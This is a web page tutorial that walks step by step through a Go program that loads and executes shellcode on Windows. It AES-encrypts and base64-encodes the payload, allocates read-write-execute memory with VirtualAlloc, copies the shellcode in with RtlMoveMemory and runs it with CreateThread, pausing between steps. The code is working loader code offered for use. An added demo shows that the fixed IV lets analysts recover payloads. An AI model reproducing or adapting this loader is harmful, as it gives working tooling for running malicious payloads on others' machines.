Complete Guide to Executing Encrypted Shellcode with Go
This page provides a step-by-step walkthrough of a Go program that executes encrypted shellcode. The payload is encrypted with AES and base64-encoded, then decoded, decrypted and executed through Windows API functions.
1. Import Necessary Packages:
import (
	"crypto/aes"      // AES block cipher
	"crypto/cipher"   // CTR stream mode
	"encoding/base64" // base64 encoding of the ciphertext
	"io/ioutil"       // file reading
	"syscall"         // Windows DLL and API access
	"time"            // delays between steps
	"unsafe"          // pointer conversion for the shellcode buffer
)
This imports packages for AES encryption, base64 encoding, file reading, Windows API functions, time delays, and unsafe operations.
2. Define Constants:
const (
MEM_COMMIT = 0x1000
MEM_RESERVE = 0x2000
PAGE_EXECUTE_READWRITE = 0x40
)
These constants define memory allocation flags and protection flags for Windows API functions.
3. Define AES Encryption Key and Cipher Function:
// 24-byte key, so aes.NewCipher selects AES-192.
var AesKey = []byte{
	0x13, 0x54, 077, 0x1A, 0xA1, 0x3F, 0x04, 0x8B, // 077 is an octal literal (decimal 63), kept as on the original page
	0x13, 0x54, 0x77, 0x69, 0x97, 0x3F, 0x33, 0x2B,
	0x31, 0x23, 0x37, 0x19, 0x91, 0x3F, 0x50, 0x9B,
}
type CipherFunc func(key []byte, src []byte) []byte
func AesCipher(key []byte, src []byte) []byte {
	block, _ := aes.NewCipher(key)    // error discarded; key length must be 16, 24 or 32 bytes
	iv := make([]byte, aes.BlockSize) // all-zero IV, fixed for every call
	stream := cipher.NewCTR(block, iv)
	dst := make([]byte, len(src))
	stream.XORKeyStream(dst, src) // CTR: XOR with the keystream, so encrypt and decrypt are the same operation
	return dst
}
func Crypt(cipher CipherFunc, key []byte, src []byte) []byte {
	return cipher(key, src)
}
These define the AES key, an AES-CTR cipher function that always uses an all-zero IV, and a generic Crypt wrapper that applies any CipherFunc with a given key. Because CTR mode XORs the data with a keystream, AesCipher both encrypts and decrypts; with the IV fixed, that keystream is the same for every payload encrypted under this key.
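As an added example (not code from the original page), the following Go program shows the consequence of the fixed all-zero IV: CTR mode reduces AES to a constant keystream, so decryption is the same call as encryption, and an analyst holding one plaintext/ciphertext pair can recover any other sample produced with the same key without knowing the key. demoKey and the sample payload strings are constructed for the demo.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"fmt"
)

// demoKey is a constructed 24-byte (AES-192) key for this demo, not the page's key.
var demoKey = []byte("0123456789abcdef01234567")

// aesCTRFixedIV mirrors the page's AesCipher: AES-CTR with an all-zero IV, so
// every message encrypted under the same key is XORed with the same keystream.
func aesCTRFixedIV(key, src []byte) []byte {
	block, err := aes.NewCipher(key)
	if err != nil {
		panic(err)
	}
	iv := make([]byte, aes.BlockSize) // fixed zero IV, exactly as on the page
	dst := make([]byte, len(src))
	cipher.NewCTR(block, iv).XORKeyStream(dst, src)
	return dst
}

// xorBytes XORs a and b up to the shorter length.
func xorBytes(a, b []byte) []byte {
	n := len(a)
	if len(b) < n {
		n = len(b)
	}
	out := make([]byte, n)
	for i := range out {
		out[i] = a[i] ^ b[i]
	}
	return out
}

// recoverOther decrypts c2 without the key, given one known plaintext/ciphertext
// pair (p1, c1) made under the same key and fixed IV: the keystream is p1 XOR c1,
// and c2 XOR that keystream is p2 (for the first len(p1) bytes).
func recoverOther(p1, c1, c2 []byte) []byte {
	return xorBytes(xorBytes(p1, c1), c2)
}

func main() {
	p1 := []byte("constructed sample payload number one")
	p2 := []byte("constructed sample payload two")
	c1, c2 := aesCTRFixedIV(demoKey, p1), aesCTRFixedIV(demoKey, p2)
	fmt.Printf("second sample recovered without the key: %q\n", recoverOther(p1, c1, c2))
}
```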
4. Define Base64 Encoding and Decoding Functions:
func Encode(src string) string {
payloadBytes := []byte(src)
encodedBytes := Crypt(AesCipher, AesKey, payloadBytes)
bdata := base64.StdEncoding.EncodeToString(encodedBytes)
return bdata
}
func Decode(src string) []byte {
decodedBytes, _ := base64.StdEncoding.DecodeString(src)
payloadBytes := Crypt(AesCipher, AesKey, decodedBytes)
return payloadBytes
}
Encode encrypts a string payload with AesCipher and base64-encodes the result; Decode reverses both steps. Note that the base64 decoding error is discarded.
5. Define Windows API Functions:
var (
kernel32 = syscall.NewLazyDLL("kernel32.dll")
ntdll = syscall.NewLazyDLL("ntdll.dll")
VirtualAlloc = kernel32.NewProc("VirtualAlloc")
RtlMoveMemory = ntdll.NewProc("RtlMoveMemory")
CreateThread = kernel32.NewProc("CreateThread")
)
These variables define Windows API functions for memory allocation, memory copying, and thread creation.
6. Define Shellcode Execution Function:
func exec(charcode []byte) {
addr, _, _ := VirtualAlloc.Call(0, uintptr(len(charcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)
time.Sleep(5 * time.Second)
_, _, _ = RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&charcode[0])), uintptr(len(charcode)))
time.Sleep(5 * time.Second)
handle, _, _ := CreateThread.Call(0, 0, addr, 0, 0, 0)
time.Sleep(5 * time.Second)
syscall.WaitForSingleObject(syscall.Handle(handle), syscall.INFINITE)
}
This function allocates memory, copies shellcode to the allocated memory, creates a thread to execute it, and waits for the thread to finish.
7. Define File Reading Function:
func readFile(filename string) []byte {
	data, _ := ioutil.ReadFile(filename) // error discarded; ioutil.ReadFile is deprecated since Go 1.16 in favour of os.ReadFile
	return data
}
This function reads a binary file and returns its contents as a byte array.
8. Define Main Function:
func main() {
payload := string(readFile("./payload.bin"))
encodedPayload := Encode(payload)
shellCodeHex := Decode(encodedPayload)
exec(shellCodeHex)
}
The main function reads a binary file named "payload.bin" into a string, encrypts and base64-encodes it with Encode, immediately decodes and decrypts that result back into the original bytes with Decode, and executes them with the exec function. Since Encode and Decode run in the same process, the plaintext payload.bin is still read from disk at runtime.
Original source: https://www.cveoy.top/t/topic/lKEN. Copyright belongs to the author. Do not reproduce or scrape!